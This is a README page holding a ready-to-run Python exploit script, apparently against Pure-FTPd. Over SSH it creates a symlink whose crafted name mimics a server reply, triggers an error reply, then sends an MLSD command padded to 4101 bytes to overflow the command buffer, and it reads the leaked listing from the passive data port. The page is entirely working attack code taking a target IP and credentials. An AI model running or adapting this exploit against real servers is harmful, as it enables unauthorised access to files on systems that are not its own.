README.md
Rendering markdown...
from pwn import remote
import paramiko
import sys
import re
if len(sys.argv) != 6:
print("Usage: python3 pure.py <server_ip> <ftp-port> <username> <password> <attack dir>")
sys.exit(1)
ip = sys.argv[1]
port = sys.argv[2]
username = sys.argv[3]
password = sys.argv[4]
attack_dir = sys.argv[5]
# connect to ssh and create sym link
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
# Connect to the SSH server
client.connect(ip, 22, username, password)
command = f"""
cd /home
ln -snf {attack_dir} $'e can\\'t do that in the current session\\r\\nogin\\r\\n'
"""
# Execute the command
stdin, stdout, stderr = client.exec_command(command)
except Exception as e:
print(f"An error occurred: {e}")
finally:
# Close the SSH connection
client.close()
# Connect to ftp server & do exploit
session=remote(ip, port)
# authentication
session.sendline(b"USER " + username.encode())
session.sendline(b"PASS " + password.encode())
#Send the extended passive mode , and capture the port number
session.sendline(b"EPSV")
response = session.recvuntil(b")").decode()
match = re.search(r'\|\|\|(\d+)\|', response)
if match:
epsv_port = int(match.group(1))
print(f"Extracted EPSV port: {epsv_port}")
else:
print("No EPSV port found in the response.")
session.close()
sys.exit(1)
# Intentionally trigger an error message for a constant string in the reply buffer
session.sendline(b"PASS")
# Should reply: 530 We can't do that in the current session
print(session.recvline().decode())
# Overflow the cmd buffer
payload=b"MLSD -".ljust(4101,b'.')
session.sendline(payload)
print(session.recvline().decode())
# Connect to pasv port for MLSD response
pasv=remote(ip,epsv_port)
# Read and print all lines from the passive connection until no more data
try:
while True:
try:
line = pasv.recvline(timeout=1)
if not line:
print("END")
break
print(line.decode().strip())
except:
break
finally:
pasv.close()
session.close()